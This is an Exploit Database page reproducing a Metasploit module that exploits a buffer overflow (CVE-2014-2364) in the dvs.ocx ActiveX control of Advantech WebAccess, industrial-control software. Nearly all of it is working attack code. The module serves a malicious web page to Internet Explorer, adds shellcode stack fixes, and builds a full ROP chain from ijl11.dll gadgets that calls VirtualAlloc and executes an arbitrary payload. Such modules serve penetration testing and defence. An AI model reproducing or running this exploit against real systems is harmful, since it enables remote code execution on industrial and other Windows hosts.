Advantech Webaccess – dvs.ocx GetColor Buffer Overflow (Metasploit)

• Exploit Database
• 14 阅读

• 作者： Metasploit
  日期： 2014-09-24
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/34757/

• ##
  # This module requires Metasploit: http//metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::Remote::BrowserExploitServer
  
  def initialize(info = {})
  super(update_info(info,
  'Name'=> 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
  'Description' => %q{
  This module exploits a buffer overflow vulnerability in Advantec WebAccess. The
  vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to
  sprintf can be reached with user controlled data through the GetColor function.
  This module has been tested successfully on Windows XP SP3 with IE6 and Windows
  7 SP1 with IE8 and IE 9.
  },
  'License' => MSF_LICENSE,
  'Author'=>
  [
  'Unknown', # Vulnerability discovery
  'juan vazquez' # Metasploit module
  ],
  'References'=>
  [
  ['CVE', '2014-2364'],
  ['ZDI', '14-255'],
  ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
  ],
  'DefaultOptions'=>
  {
  'Retries'=> false,
  'InitialAutoRunScript' => 'migrate -f'
  },
  'BrowserRequirements' =>
  {
  :source=> /script|headers/i,
  :os_name => Msf::OperatingSystems::WINDOWS,
  :ua_name => /MSIE/i,
  :ua_ver=> lambda { |ver| Gem::Version.new(ver) <Gem::Version.new('10') },
  :clsid => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
  :method=> "GetColor"
  },
  'Payload' =>
  {
  'Space' => 1024,
  'DisableNops' => true,
  'BadChars'=> "\x00\x0a\x0d\x5c",
  # Patch the stack to execute the decoder...
  'PrependEncoder'=> "\x81\xc4\x9c\xff\xff\xff", # add esp, -100
  # Fix the stack again, this time better :), before the payload
  # is executed.
  'Prepend' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
   "\x83\xC0\x08" + # add eax, byte 8
   "\x8b\x20" + # mov esp, [eax]
   "\x81\xC4\x30\xF8\xFF\xFF"# add esp, -2000
  },
  'Platform'=> 'win',
  'Arch'=> ARCH_X86,
  'Targets' =>
  [
  [ 'Automatic', { } ]
  ],
  'DefaultTarget' => 0,
  'DisclosureDate'=> 'Jul 17 2014'))
  end
  
  def on_request_exploit(cli, request, target_info)
  print_status("Requested: #{request.uri}")
  
  content = <<-EOS
  <html>
  <head>
  <meta http-equiv="cache-control" content="max-age=0" />
  <meta http-equiv="cache-control" content="no-cache" />
  <meta http-equiv="expires" content="0" />
  <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
  <meta http-equiv="pragma" content="no-cache" />
  </head>
  <body>
  <object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
  <script language='javascript'>
  test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
  </script>
  </body>
  </html>
  EOS
  
  print_status("Sending #{self.name}")
  send_response_html(cli, content, {'Pragma' => 'no-cache'})
  end
  
  # Uses gadgets from ijl11.dll 1.1.2.16
  def rop_payload(code)
  xpl = rand_text_alphanumeric(61) # offset
  xpl << [0x60014185].pack("V")# RET
  xpl << rand_text_alphanumeric(8)
  
  # EBX = dwSize (0x40)
  xpl << [0x60012288].pack("V") # POP ECX # RETN
  xpl << [0xffffffff].pack("V") # ecx value
  xpl << [0x6002157e].pack("V") # POP EAX # RETN
  xpl << [0x9ffdafc9].pack("V") # eax value
  xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
  xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
  xpl << [0x60018084].pack("V") # POP EBP # RETN
  xpl << rand_text_alphanumeric(4) # padding
  xpl << rand_text_alphanumeric(4) # padding
  xpl << rand_text_alphanumeric(4) # padding
  xpl << rand_text_alphanumeric(4) # padding
  xpl << [0x60029f6c].pack("V") # .data ijl11.dll
  xpl << [0x60012288].pack("V") # POP ECX # RETN
  xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)
  xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
  # EDX = flAllocationType (0x1000)
  xpl << [0x60012288].pack("V") # POP ECX # RETN
  xpl << [0xffffffff].pack("V") # ecx value
  xpl << [0x6002157e].pack("V") # POP EAX # RETN
  xpl << [0x9ffdbf89].pack("V") # eax value
  xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
  xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
  # ECX = flProtect (0x40)
  xpl << [0x6002157e].pack("V") # POP EAX # RETN
  xpl << rand_text_alphanumeric(4) # padding
  xpl << rand_text_alphanumeric(4) # padding
  xpl << rand_text_alphanumeric(4) # padding
  xpl << rand_text_alphanumeric(4) # padding
  xpl << [0x60029f6c].pack("V") # .data ijl11.dll
  xpl << [0x60012288].pack("V") # POP ECX # RETN
  xpl << [0xffffffff].pack("V") # ecx value
  0x41.times do
  xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
  end
  # EAX = ptr to &VirtualAlloc()
  xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll]
  xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll]
  # EBP = POP (skip 4 bytes)
  xpl << [0x6002054b].pack("V") # POP EBP # RETN
  xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn)
  # ESI = ptr to JMP [EAX]
  xpl << [0x600181cc].pack("V") # POP ESI # RETN
  xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax])
  # EDI = ROP NOP (RETN)
  xpl << [0x60021ad1].pack("V") # POP EDI # RETN
  xpl << [0x60021ad2].pack("V") # ptr to &(retn)
  # ESP = lpAddress (automatic)
  # PUSHAD # RETN
  xpl << [0x60018399].pack("V") # PUSHAD # RETN
  xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn)
  xpl << code
  
  xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string
  xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping
  
  xpl
  end
  
  end